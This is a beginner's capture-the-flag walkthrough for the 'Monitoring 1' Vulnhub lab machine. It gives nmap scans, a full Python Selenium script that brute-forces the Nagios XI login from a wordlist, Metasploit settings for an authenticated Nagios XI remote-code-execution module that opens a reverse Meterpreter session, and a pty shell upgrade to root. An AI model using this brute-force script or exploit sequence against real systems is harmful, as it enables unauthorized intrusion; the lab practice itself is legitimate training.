Vulnhub: Monitoring 1 – CTF

Hello cyberman!

This article subject CTF (Capture To Flag). This vulnerability machine is name “Monitoring 1”.

And this ctf is level 1. This machine has ubuntu. And it is a OS.
This CTF is like game. They have vulnerability machine and you are crack it.
For this first you need it below list:

First install “monitoring 1” in VMware. And then install kali linux in VMware. If you don’t know, how is install so, this article subject not “How to install virtual machine.” For it please search it in Google.

If you are ready, I starting. I run kali linux in VMware then scan ip address for find target. For this process has two way in basic level.
1- Nmap
2- Netdiscover
I usually use nmap.
First of all, which gateway are we located in? Our command to find out:

$ ifconfig

Example result is like the picture above. Okay, we learned. We need do scanning gateway 192.168.1.0-255. Now, we enter command in terminal:

$ nmap 192.168.1.0/24

Okay we learned ip address to target machine.
As seen in the picture below.

Now we need details scanning.
Enter command in terminal:

$  sudo nmap 192.168.1.64 -A -sV -sF -Pn

Okay, now we get it detail for machine. A scan result below.

And this picture like seen. The has Nagios Service running in this machine. It is nice. Ok, let go look at the its web page. Open firefox in kali linux then enter to url area: 192.168.1.64 (Or youre target ip address which it.) Now, there is a web address that directs you to a login panel.

Now… I’m tried SQL Injection with SQLMAP and Burp Suite. But hasn’t sql injection in login page. So, I think different way. This has a way. I know its definitely. And it occurred solution to me: Brute force. 🙂
Yes I know, its bad way. But I dont finded another way.

We need it a two info:
1- User Name
2- Password

This a CTF. And usually wordlists have passwords. So, I find a way. Okay, now I need “User Name”. First usually be “admin”, “administrator” and etc. But I think not.
Now, a little search in internet.

Now, we a little search in internet. Search in google like: “What is Usually username for nagios service.”

Yes, I found. It is username: “nagiosadmin”. Now, it’s time for a try.

Now, we need way for brute force.
I tried below hack tools:

  • Burp Suite
  • Hydra

But it didn’t produce results. Because Burp Suite very slow and Hydra not working. I guess I couldn’t get it to work.

And then, I did think. I did say “I will write an attack tool myself with python.” I decided.
And I wrote.

My code like below:

from selenium import webdriver
from webdriver_manager.firefox import GeckoDriverManager
from bs4 import BeautifulSoup

driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())
driver.get("http://192.168.1.64/nagiosxi/login.php")

inputElement = driver.find_element("id","usernameBox")
inputElement.send_keys("nagiosadmin")
tryNumber = 1

for passi in open("pass.list", "r"):

    passtxt = str(passi).strip()
    inputElement = driver.find_element("id","passwordBox")
    inputElement.send_keys(passtxt)
    button = driver.find_element("id", "loginButton")
    button.click()
    soup = BeautifulSoup(str(driver.page_source), "html.parser")
    check = soup.find_all("ul", {"class": "errorMessage"})
    
    try:
        print(str(tryNumber)+" [-] Try: "+passtxt+" / Result: "+str(check[0].text).strip())
    except:
        print(str(tryNumber)+" [+] I find this password: "+passtxt)
        break
    tryNumber = tryNumber + 1  

This code requirements:

  • Selenium Lib.
  • webdriver_manager Lib
  • BS4 / BeatifulSoup Lib.
  • A wordlist. I tried ready wordlist. It is path: “/usr/share/wordlists/john.lst”

And finally I found. It is like joke: Password is “admin”.

Now, we need wonderful tools, it is name: metasploit-framework. Enter type “msfconsole” in terminal then push enter. msf works.

Now, we search nagios in msf. Result list like picture below.

Okay, now. We need chooise We need choose a exploit. I selected “exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce”. And typed for this “use exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce” then I choose. I mean, push enter.

Okay now, we selected exploit.
We do settings it. I typed “Show options” then I push enter. That show options for us.

Enter the following commands to edit the options:

set PASSWORD admin <press enter>
set LHOST <youre ip address> <press enter>
set RHOSTS <target ip address, 192.168.1.64 is mine.> <press enter>

And then the magic word… type “exploit” and hit enter.

Now, we need to open the shell. We have established the connection with Meterpreter.
Type “shell” and press enter.

And then enter this command: python -c ‘import pty;pty.spawn(“/bin/bash”)’

What we do here is we establish a connection to the terminal of the target system. And we use python language to get root rights ourselves.

For example as below:

And then press enter.

root@ubuntu:/usr/local/nagiosxi/html/includes/components/profile# 

A command like the one above will appear and we have become the system administrator by accessing this system from outside.
If you want to grab the flag, type the command: “cd /root” and hit enter. And read the .TXT file.

Have a nice day with lots of informatics. 🙂

1 Comment

Leave a Reply

Your email address will not be published. Required fields are marked *